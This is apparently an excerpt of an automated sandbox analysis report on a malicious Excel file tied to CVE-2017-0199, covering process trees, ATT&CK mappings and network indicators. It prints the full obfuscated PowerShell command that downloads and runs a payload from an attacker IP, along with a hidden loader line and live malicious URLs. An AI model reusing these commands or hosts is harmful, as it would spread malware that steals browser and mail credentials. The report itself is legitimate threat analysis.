        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exe TID: 3632Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep count: 2752 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep count: 3611 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3024Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 804Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 2136Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_004062A3 FindFirstFileA,FindClose,11_2_004062A3
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,11_2_00405768
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_004026FE FindFirstFileA,11_2_004026FE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeAPI call chain: ExitProcess graph end nodegraph_11-3300
        Source: C:\Users\user\AppData\Roaming\wlanext.exeAPI call chain: ExitProcess graph end nodegraph_11-3293
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_06711653 LdrInitializeThunk,17_2_06711653
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 1710000Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exEJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wlanext.exe "C:\Users\user\AppData\Roaming\wlanext.exe" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp" "c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jfzrysagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagieferc1uwvbficagicagicagicagicagicagicagicagicagicagic1nru1izxjeruzpbmluau9oicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1umxtt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbna1zra2xswixzdhjpbmcgicagicagicagicagicagicagicagicagicagicaga2hjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicaga1zqd3ztlhvpbnqgicagicagicagicagicagicagicagicagicagicagswl5cvnoleludfb0ciagicagicagicagicagicagicagicagicagicagicbktmopoycgicagicagicagicagicagicagicagicagicagicaglu5htwugicagicagicagicagicagicagicagicagicagicaginrkeklwbkpaqllriiagicagicagicagicagicagicagicagicagicagicatbmfnrxnqywnlicagicagicagicagicagicagicagicagicagicagifflevygicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakvmthojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumje0lzkwmi93ywxuzxh0lmv4zsisiirftny6qvbqrefuqvx3bgfuzxh0lmv4zsismcwwkttzdefsvc1ztgvfccgzkttzvgfsvcagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhdsyw5lehquzxhlig=='+[char]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jfzrysagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagieferc1uwvbficagicagicagicagicagicagicagicagicagicagic1nru1izxjeruzpbmluau9oicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1umxtt24urgxsiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbna1zra2xswixzdhjpbmcgicagicagicagicagicagicagicagicagicagicaga2hjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicaga1zqd3ztlhvpbnqgicagicagicagicagicagicagicagicagicagicagswl5cvnoleludfb0ciagicagicagicagicagicagicagicagicagicagicbktmopoycgicagicagicagicagicagicagicagicagicagicaglu5htwugicagicagicagicagicagicagicagicagicagicaginrkeklwbkpaqllriiagicagicagicagicagicagicagicagicagicagicatbmfnrxnqywnlicagicagicagicagicagicagicagicagicagicagifflevygicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakvmthojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumje0lzkwmi93ywxuzxh0lmv4zsisiirftny6qvbqrefuqvx3bgfuzxh0lmv4zsismcwwkttzdefsvc1ztgvfccgzkttzvgfsvcagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhdsyw5lehquzxhlig=='+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040320C
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: Yara matchFile source: 00000011.00000002.629304100.0000000022061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2100, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid Accounts121
        Windows Management Instrumentation
        1
        Scripting
        1
        DLL Side-Loading
        11
        Obfuscated Files or Information
        1
        OS Credential Dumping
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        13
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts13
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Install Root Certificate
        LSASS Memory27
        System Information Discovery
        Remote Desktop Protocol1
        Data from Local System
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter
        Logon Script (Windows)311
        Process Injection
        1
        DLL Side-Loading
        Security Account Manager11
        Security Software Discovery
        SMB/Windows Admin Shares11
        Email Collection
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts3
        PowerShell
        Login HookLogin Hook1
        Masquerading
        NTDS1
        Process Discovery
        Distributed Component Object Model2
        Clipboard Data
        23
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
        Virtualization/Sandbox Evasion
        LSA Secrets131
        Virtualization/Sandbox Evasion
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Access Token Manipulation
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
        Process Injection
        DCSync1
        Remote System Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543746 Sample: SecuriteInfo.com.Exploit.CV... Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 79 Suricata IDS alerts for network traffic 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 Yara detected HtmlPhish44 2->83 85 10 other signatures 2->85 10 EXCEL.EXE 31 25 2->10         started        process3 dnsIp4 61 107.175.113.214, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 10->61 63 qrisni.me 188.114.96.3, 443, 49163, 49165 CLOUDFLARENETUS European Union 10->63 51 ~$SecuriteInfo.com...en.16537.13180.xlsx, data 10->51 dropped 53 niceworkingthingsw...withgoodnews[1].hta, HTML 10->53 dropped 99 Microsoft Office drops suspicious files 10->99 15 mshta.exe 10 10->15         started        file5 signatures6 process7 dnsIp8 65 qrisni.me 15->65 67 Suspicious powershell command line found 15->67 69 PowerShell case anomaly found 15->69 19 powershell.exe 23 15->19         started        signatures9 process10 file11 41 C:\Users\user\AppData\Roaming\wlanext.exe, PE32 19->41 dropped 43 C:\Users\user\AppData\...\walnext[1].exe, PE32 19->43 dropped 45 C:\Users\user\AppData\...\muz5o0kx.cmdline, Unicode 19->45 dropped 87 Powershell drops PE file 19->87 23 wlanext.exe 1 19 19->23         started        27 powershell.exe 4 19->27         started        29 csc.exe 2 19->29         started        signatures12 process13 file14 47 C:\Users\user\AppData\...47ahani132.Udf, ASCII 23->47 dropped 95 Suspicious powershell command line found 23->95 31 powershell.exe 4 23->31         started        97 Installs new ROOT certificates 27->97 49 C:\Users\user\AppData\Local\...\muz5o0kx.dll, PE32 29->49 dropped 35 cvtres.exe 29->35         started        signatures15 process16 file17 55 C:\Users\user\AppData\Roaming\...\wlanext.exe, PE32 31->55 dropped 71 Early bird code injection technique detected 31->71 73 Writes to foreign memory regions 31->73 75 Queues an APC in another process (thread injection) 31->75 77 Powershell drops PE file 31->77 37 msiexec.exe 11 31->37         started        signatures18 process19 dnsIp20 57 bookinginfo.asia 199.217.106.226, 443, 49168 AXCELX-NETUS United States 37->57 59 www.bookinginfo.asia 37->59 89 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->89 91 Tries to steal Mail credentials (via file / registry access) 37->91 93 Tries to harvest and steal browser information (history, passwords, etc) 37->93 signatures21

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx21%ReversingLabsWin32.Exploit.CVE-2017-0199
        SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://crl.entrust.net/server1.crl00%URL Reputationsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        http://go.micros0%URL Reputationsafe
        http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://secure.comodo.com/CPS00%URL Reputationsafe
        http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        qrisni.me
        188.114.96.3
        truefalse
          unknown
          bookinginfo.asia
          199.217.106.226
          truefalse
            unknown
            www.bookinginfo.asia
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigofalse
                unknown
                http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htatrue
                  unknown
                  http://107.175.113.214/902/walnext.exetrue
                    unknown
                    https://www.bookinginfo.asia/pkeZmGiUuTK20.binfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://qrisni.me/mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424187501.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.444388800.000000000220C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta&fric3mshta.exe, 00000004.00000003.412834526.0000000000586000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://qrisni.me/Lmshta.exe, 00000004.00000002.424187501.00000000036C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://107.175.113.214/902/walnepowershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ocsp.entrust.net03mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
